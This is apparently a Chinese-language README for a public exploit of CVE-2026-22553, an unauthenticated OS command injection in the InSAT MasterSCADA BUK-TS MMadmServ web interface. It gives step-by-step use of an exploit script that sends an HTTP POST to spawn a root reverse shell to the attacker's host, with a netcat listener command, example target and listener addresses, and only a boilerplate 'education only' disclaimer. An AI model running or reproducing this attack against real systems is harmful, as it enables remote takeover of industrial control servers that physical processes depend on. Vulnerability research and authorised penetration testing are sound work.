
针对 InSAT MasterSCADA BUK-TS MMadmServ Web 界面的未认证操作系统命令注入漏洞利用程序。通过 HTTP POST 请求传递具有 root 权限的反向 Shell。CVSS 9.8 严重等级。
CVE-2026-22553 | CVSS 9.8 严重| 漏洞利用作者 Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS 在 MMadmServ Web 界面中存在一个未认证的 OS 命令注入漏洞。该缺陷允许远程攻击者在无需任何身份认证的情况下实现完全远程代码执行(RCE)。
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fffpython3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| 选项 | 说明 |
|---|---|
target | 目标 URL(例如 http://ip:port) |
--lhost | 你的 IP 地址(反向 Shell) |
--lport | 你的监听端口 |
在你的机器上启动监听器:
nc -lvnp 4444
运行漏洞利用脚本:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
获取具有 root/系统权限 的反向 Shell。
本漏洞利用程序仅供教育和授权渗透测试目的使用。
对非您拥有的系统进行未经授权的使用是非法的,并可能违反国际法律。
作者对任何滥用行为不承担责任。
Mohammed Idrees Banyamer
如果您觉得本仓库有用,请给它点个 Star ⭐!